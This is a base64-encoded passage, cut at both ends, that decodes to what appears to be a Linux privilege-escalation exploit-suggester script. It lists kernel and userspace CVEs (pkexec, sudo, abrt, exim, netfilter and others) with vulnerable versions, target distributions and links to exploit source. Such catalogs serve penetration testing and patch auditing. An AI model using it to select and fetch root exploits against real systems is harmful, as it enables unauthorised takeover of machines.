jLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NTg4Ni56aXAKZXhwbG9pdC1kYjogNDU4ODYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xMzI3Ml0ke3R4dHJzdH0gUFRSQUNFX1RSQUNFTUUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQsdmVyPDUuMS4xNyxzeXNjdGw6a2VybmVsLnlhbWEucHRyYWNlX3Njb3BlPT0wLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuMTUuMC0qfSx1YnVudHU9MTguMDR7a2VybmVsOjQuMTUuMC0qfSxkZWJpYW49OXtrZXJuZWw6NC45LjAtKn0sZGViaWFuPTEwe2tlcm5lbDo0LjE5LjAtKn0sZmVkb3JhPTMwe2tlcm5lbDo1LjAuOS0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE5MDMKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NzEzMy56aXAKZXh0LXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEzMjcyL3BvYy5jCkNvbW1lbnRzOiBSZXF1aXJlcyBhbiBhY3RpdmUgUG9sS2l0IGFnZW50LgpleHBsb2l0LWRiOiA0NzEzMwpleHBsb2l0LWRiOiA0NzE2MwphdXRob3I6IEphbm4gSG9ybiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xNTY2Nl0ke3R4dHJzdH0gWEZSTV9VQUYKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMsdmVyPDUuMC4xOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MSxDT05GSUdfWEZSTT15ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2R1YXN5bnQuY29tL2Jsb2cvdWJ1bnR1LWNlbnRvcy1yZWRoYXQtcHJpdmVzYwpiaW4tdXJsOiBodHRwczovL2dpdGh1Yi5jb20vZHVhc3ludC94ZnJtX3BvYy9yYXcvbWFzdGVyL2x1Y2t5MApDb21tZW50czogQ09ORklHX1VTRVJfTlMgbmVlZHMgdG8gYmUgZW5hYmxlZDsgQ09ORklHX1hGUk0gbmVlZHMgdG8gYmUgZW5hYmxlZAphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMjczNjVdJHt0eHRyc3R9IGxpbnV4LWlzY3NpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD01LjExLjMsQ09ORklHX1NMQUJfRlJFRUxJU1RfSEFSREVORUQhPXkKVGFnczogUkhFTD04ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cuZ3JpbW0tY28uY29tLzIwMjEvMDMvbmV3LW9sZC1idWdzLWluLWxpbnV4LWtlcm5lbC5odG1sCnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9ncmltbS1jby9Ob3RRdWl0ZTBEYXlGcmlkYXkvemlwL3RydW5rCkNvbW1lbnRzOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRCBtdXN0IG5vdCBiZSBlbmFibGVkCmF1dGhvcjogR1JJTU0KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0zNDkwXSR7dHh0cnN0fSBlQlBGIEFMVTMyIGJvdW5kcyB0cmFja2luZyBmb3IgYml0d2lzZSBvcHMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTUuNyx2ZXI8NS4xMixDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0oMjV8MjZ8Mjd8Mjh8Mjl8MzB8MzF8MzJ8MzN8MzR8MzV8MzZ8Mzd8Mzh8Mzl8NDB8NDF8NDJ8NDN8NDR8NDV8NDZ8NDd8NDh8NDl8NTB8NTF8NTIpLSp9LHVidW50dT0yMS4wNHtrZXJuZWw6NS4xMS4wLTE2LSp9ClJhbms6IDUKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5ncmFwbHNlY3VyaXR5LmNvbS9wb3N0L2tlcm5lbC1wd25pbmctd2l0aC1lYnBmLWEtbG92ZS1zdG9yeQpzcmMtdXJsOiBodHRwczovL2NvZGVsb2FkLmdpdGh1Yi5jb20vY2hvbXBpZTEzMzcvTGludXhfTFBFX2VCUEZfQ1ZFLTIwMjEtMzQ5MC96aXAvbWFpbgpDb21tZW50czogQ09ORklHX0JQRl9TWVNDQUxMIG5lZWRzIHRvIGJlIHNldCAmJiBrZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCAhPSAxCmF1dGhvcjogY2hvbXBpZTEzMzcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0yMjU1NV0ke3R4dHJzdH0gTmV0ZmlsdGVyIGhlYXAgb3V0LW9mLWJvdW5kcyB3cml0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE5LHZlcjw9NS4xMi1yYzYKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGUuZ2l0aHViLmlvL3NlY3VyaXR5LXJlc2VhcmNoL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvd3JpdGV1cC5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9nb29nbGUvc2VjdXJpdHktcmVzZWFyY2gvbWFzdGVyL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvZXhwbG9pdC5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAyMS0yMjU1NS9leHBsb2l0LmMKQ29tbWVudHM6IGlwX3RhYmxlcyBrZXJuZWwgbW9kdWxlIG11c3QgYmUgbG9hZGVkCmV4cGxvaXQtZGI6IDUwMTM1CmF1dGhvcjogdGhlZmxvdyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCiMjIyMjIyMjIyMjIyBVU0VSU1BBQ0UgRVhQTE9JVFMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMTg2XSR7dHh0cnN0fSBzYW1iYQpSZXFzOiBwa2c9c2FtYmEsdmVyPD0yLjIuOApUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAyMzY3NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0xMTg1XSR7dHh0cnN0fSB1ZGV2ClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEsY21kOltbIC1mIC9ldGMvdWRldi9ydWxlcy5kLzk1LXVkZXYtbGF0ZS5ydWxlcyB8fCAtZiAvbGliL3VkZXYvcnVsZXMuZC85NS11ZGV2LWxhdGUucnVsZXMgXV0KVGFnczogdWJ1bnR1PTguMTB8OS4wNApSYW5rOiAxCmV4cGxvaXQtZGI6IDg1NzIKQ29tbWVudHM6IFZlcnNpb248MS40LjEgdnVsbmVyYWJsZSBidXQgZGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZCAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMTE4NV0ke3R4dHJzdH0gdWRldiAyClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA4NDc4CkNvbW1lbnRzOiBTU0ggYWNjZXNzIHRvIG5vbiBwcml2aWxlZ2VkIHVzZXIgaXMgbmVlZGVkLiBWZXJzaW9uPDEuNC4xIHZ1bG5lcmFibGUgYnV0IGRpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMDgzMl0ke3R4dHJzdH0gUEFNIE1PVEQKUmVxczogcGtnPWxpYnBhbS1tb2R1bGVzLHZlcjw9MS4xLjEKVGFnczogdWJ1bnR1PTkuMTB8MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNDMzOQpDb21tZW50czogU1NIIGFjY2VzcyB0byBub24gcHJpdmlsZWdlZCB1c2VyIGlzIG5lZWRlZApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MTcwXSR7dHh0cnN0fSBTeXN0ZW1UYXAKUmVxczogcGtnPXN5c3RlbXRhcCx2ZXI8PTEuMwpUYWdzOiBSSEVMPTV7c3lzdGVtdGFwOjEuMS0zLmVsNX0sZmVkb3JhPTEze3N5c3RlbXRhcDoxLjItMS5mYzEzfQpSYW5rOiAxCmF1dGhvcjogVGF2aXMgT3JtYW5keQpleHBsb2l0LWRiOiAxNTYyMApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMS0xNDg1XSR7dHh0cnN0fSBwa2V4ZWMKUmVxczogcGtnPXBvbGtpdCx2ZXI9MC45NgpUYWdzOiBSSEVMPTYsdWJ1bnR1PTEwLjA0fDEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTc5NDIKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTEtMjkyMV0ke3R4dHJzdH0ga3RzdXNzClJlcXM6IHBrZz1rdHN1c3MsdmVyPD0xLjQKVGFnczogc3Bhcmt5PTV8NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDExLzA4LzEzLzIKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTEtMjkyMS9rdHN1c3MtbHBlLnNoCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTA4MDldJHt0eHRyc3R9IGRlYXRoX3N0YXIgKHN1ZG8pClJlcXM6IHBrZz1zdWRvLHZlcj49MS44LjAsdmVyPD0xLjguMwpUYWdzOiBmZWRvcmE9MTYgClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL2Z1bGxkaXNjbG9zdXJlLzIwMTIvSmFuL2F0dC01OTAvYWR2aXNvcnlfc3Vkby50eHQKZXhwbG9pdC1kYjogMTg0MzYKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDQ3Nl0ke3R4dHJzdH0gY2hrcm9vdGtpdApSZXFzOiBwa2c9Y2hrcm9vdGtpdCx2ZXI8MC41MApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE0L3EyLzQzMApleHBsb2l0LWRiOiAzMzg5OQpDb21tZW50czogUm9vdGluZyBkZXBlbmRzIG9uIHRoZSBjcm9udGFiICh1cCB0byBvbmUgZGF5IG9mIGRlbGF5KQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC01MTE5XSR7dHh0cnN0fSBfX2djb252X3RyYW5zbGl0X2ZpbmQKUmVxczogcGtnPWdsaWJjfGxpYmM2LHg4NgpUYWdzOiBkZWJpYW49NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE0LzA4L3RoZS1wb2lzb25lZC1udWwtYnl0ZS0yMDE0LWVkaXRpb24uaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy8zNDQyMS50YXIuZ3oKZXhwbG9pdC1kYjogMzQ0MjEKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTg2Ml0ke3R4dHJzdH0gbmV3cGlkIChhYnJ0KQpSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MjAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMzE1XSR7dHh0cnN0fSByYWNlYWJydApSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MTl7YWJydDoyLjEuNS0xLmZjMTl9LGZlZG9yYT0yMHthYnJ0OjIuMi4yLTIuZmMyMH0sZmVkb3JhPTIxe2FicnQ6Mi4zLjAtMy5mYzIxfSxSSEVMPTd7YWJydDoyLjEuMTEtMTIuZWw3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvMTMwCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vdGF2aXNvL2ZlMzU5MDA2ODM2ZDZjZDEwOTFlL3Jhdy8zMmZlODQ4MWM0MzRmOGNhZDViY2Y4NTI5Nzg5MjMxNjI3ZTUwNzRjL3JhY2VhYnJ0LmMKZXhwbG9pdC1kYjogMzY3NDcKYXV0aG9yOiBUYXZpcyBPcm1hbmR5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTEzMThdJHt0eHRyc3R9IG5ld3BpZCAoYXBwb3J0KQpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzE4XSR7dHh0cnN0fSBuZXdwaWQgKGFwcG9ydCkgMgpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQuMgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL29wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wNC8xNC80CmV4cGxvaXQtZGI6IDM2NzgyCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyMDJdJHt0eHRyc3R9IGZ1c2UgKGZ1c2VybW91bnQpClJlcXM6IHBrZz1mdXNlLHZlcjwyLjkuMwpUYWdzOiBkZWJpYW49Ny4wfDguMCx1YnVudHU9KgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvNTIwCmV4cGxvaXQtZGI6IDM3MDg5CkNvbW1lbnRzOiBOZWVkcyBjcm9uIG9yIHN5c3RlbSBhZG1pbiBpbnRlcmFjdGlvbgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xODE1XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdApSZXFzOiBwa2c9c2V0cm91Ymxlc2hvb3QsdmVyPDMuMi4yMgpUYWdzOiBmZWRvcmE9MjEKUmFuazogMQpleHBsb2l0LWRiOiAzNjU2NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMjQ2XSR7dHh0cnN0fSB1c2VyaGVscGVyClJlcXM6IHBrZz1saWJ1c2VyLHZlcjw9MC42MApUYWdzOiBSSEVMPTZ7bGlidXNlcjowLjU2LjEzLSg0fDUpLmVsNn0sUkhFTD02e2xpYnVzZXI6MC42MC01LmVsN30sZmVkb3JhPTEzfDE5fDIwfDIxfDIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTUvMDcvMjMvY3ZlLTIwMTUtMzI0NS1jdmUtMjAxNS0zMjQ2L2N2ZS0yMDE1LTMyNDUtY3ZlLTIwMTUtMzI0Ni50eHQgCmV4cGxvaXQtZGI6IDM3NzA2CkNvbW1lbnRzOiBSSEVMIDUgaXMgYWxzbyB2dWxuZXJhYmxlLCBidXQgaW5zdGFsbGVkIHZlcnNpb24gb2YgZ2xpYmMgKDIuNSkgbGFja3MgZnVuY3Rpb25zIG5lZWRlZCBieSByb290aGVscGVyLmMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtNTI4N10ke3R4dHJzdH0gYWJydC9zb3NyZXBvcnQtcmhlbDcKUmVxczogcGtnPWFicnQsY21kOmdyZXAgLXFpIGFicnQgL3Byb2Mvc3lzL2tlcm5lbC9jb3JlX3BhdHRlcm4KVGFnczogUkhFTD03e2FicnQ6Mi4xLjExLTEyLmVsN30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xCnNyYy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xLzEKZXhwbG9pdC1kYjogMzg4MzIKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS02NTY1XSR7dHh0cnN0fSBub3RfYW5fc3NobnVrZQpSZXFzOiBwa2c9b3BlbnNzaC1zZXJ2ZXIsdmVyPj02LjgsdmVyPD02LjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI2LzIKZXhwbG9pdC1kYjogNDExNzMKYXV0aG9yOiBGZWRlcmljbyBCZW50bwpDb21tZW50czogTmVlZHMgYWRtaW4gaW50ZXJhY3Rpb24gKHJvb3QgdXNlciBuZWVkcyB0byBsb2dpbiB2aWEgc3NoIHRvIHRyaWdnZXIgZXhwbG9pdGF0aW9uKQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjEyXSR7dHh0cnN0fSBibHVlbWFuIHNldF9kaGNwX2hhbmRsZXIgZC1idXMgcHJpdmVzYwpSZXFzOiBwa2c9Ymx1ZW1hbix2ZXI8Mi4wLjMKVGFnczogZGViaWFuPTh7Ymx1ZW1hbjoxLjIzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly90d2l0dGVyLmNvbS90aGVncnVncS9zdGF0dXMvNjc3ODA5NTI3ODgyODEzNDQwCmV4cGxvaXQtZGI6IDQ2MTg2CmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTEyNDBdJHt0eHRyc3R9IHRvbWNhdC1yb290cHJpdmVzYy1kZWIuc2gKUmVxczogcGtnPXRvbWNhdApUYWdzOiBkZWJpYW49OCx1YnVudHU9MTYuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL1RvbWNhdC1EZWJQa2dzLVJvb3QtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdC1DVkUtMjAxNi0xMjQwLmh0bWwKc3JjLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvdG9tY2F0LXJvb3Rwcml2ZXNjLWRlYi5zaApleHBsb2l0LWRiOiA0MDQ1MAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBBZmZlY3RzIG9ubHkgRGViaWFuLWJhc2VkIGRpc3Ryb3MKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMTI0N10ke3R4dHJzdH0gbmdpbnhlZC1yb290LnNoClJlcXM6IHBrZz1uZ2lueHxuZ2lueC1mdWxsLHZlcjwxLjEwLjMKVGFnczogZGViaWFuPTgsdWJ1bnR1PTE0LjA0fDE2LjA0fDE2LjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9OZ2lueC1FeHBsb2l0LURlYi1Sb290LVByaXZFc2MtQ1ZFLTIwMTYtMTI0Ny5odG1sCnNyYy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi0xMjQ3L25naW54ZWQtcm9vdC5zaApleHBsb2l0LWRiOiA0MDc2OAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBSb290aW5nIGRlcGVuZHMgb24gY3Jvbi5kYWlseSAodXAgdG8gMjRoIG9mIGRlbGF5KS4gQWZmZWN0ZWQ6IGRlYjg6IDwxLjYuMjsgMTQuMDQ6IDwxLjQuNjsgMTYuMDQ6IDEuMTAuMDsgZ2VudG9vOiA8MS4xMC4yLXIzCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTE1MzFdJHt0eHRyc3R9IHBlcmxfc3RhcnR1cCAoZXhpbSkKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTU0OQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0xNTMxXSR7dHh0cnN0fSBwZXJsX3N0YXJ0dXAgKGV4aW0pIDIKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTUzNQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTg5XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdCAyClJlcXM6IHBrZz1zZXRyb3VibGVzaG9vdApUYWdzOiBSSEVMPTZ8NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jLXNraWxscy5ibG9nc3BvdC5jb20vMjAxNi8wNi9sZXRzLWZlZWQtYXR0YWNrZXItaW5wdXQtdG8tc2gtYy10by1zZWUuaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vc3RlYWx0aC90cm91Ymxlc2hvb3Rlci9yYXcvbWFzdGVyL3N0cmFpZ2h0LXNob290ZXIuYwpleHBsb2l0LWRiOgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01NDI1XSR7dHh0cnN0fSB0b21jYXQtUkgtcm9vdC5zaApSZXFzOiBwa2c9dG9tY2F0ClRhZ3M6IFJIRUw9NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9Ub21jYXQtUmVkSGF0LVBrZ3MtUm9vdC1Qcml2RXNjLUV4cGxvaXQtQ1ZFLTIwMTYtNTQyNS5odG1sCnNyYy11cmw6IGh0dHA6Ly9sZWdhbGhhY2tlcnMuY29tL2V4cGxvaXRzL3RvbWNhdC1SSC1yb290LnNoCmV4cGxvaXQt